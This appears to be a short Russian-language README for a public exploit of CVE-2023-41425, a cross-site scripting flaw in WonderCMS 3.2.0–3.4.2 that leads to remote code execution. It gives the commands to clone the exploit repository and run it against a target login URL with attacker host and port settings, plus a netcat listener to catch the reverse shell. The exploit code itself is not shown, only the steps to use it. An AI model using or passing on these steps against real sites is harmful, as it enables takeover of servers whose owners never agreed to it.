
CVE-2023-41425 - Уязвимость межсайтового скриптинга (XSS) в Wonder CMS v.3.2.0–v.3.4.2 позволяет удалённому злоумышленнику выполнить произвольный код с помощью специально созданного скрипта, загруженного в компонент installModule.
Уязвимость межсайтового скриптинга (Cross Site Scripting) в Wonder CMS v.3.2.0–v.3.4.2 позволяет удалённому злоумышленнику выполнить произвольный код с помощью специально созданного скрипта, загружаемого в компонент installModule. Только в образовательных целях
Требуется знание loginURL, доступ администратора или возможность заставить администратора перейти по XSS-ссылке.
git clone https://github.com/thefizzyfish/CVE-2023-41425-wonderCMS_RCE.git
usage: CVE-2023-41425.py [-h] -rhost RHOST -lhost LHOST -lport LPORT -sport SPORT
python3 CVE-2023-41425.py -rhost http://example.com/loginURL -lhost 10.10.14.7 -lport 9001 -sport 8000
nc -lnvp 9001

prodigiousMind за обнаружение и сообщение об уязвимости https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413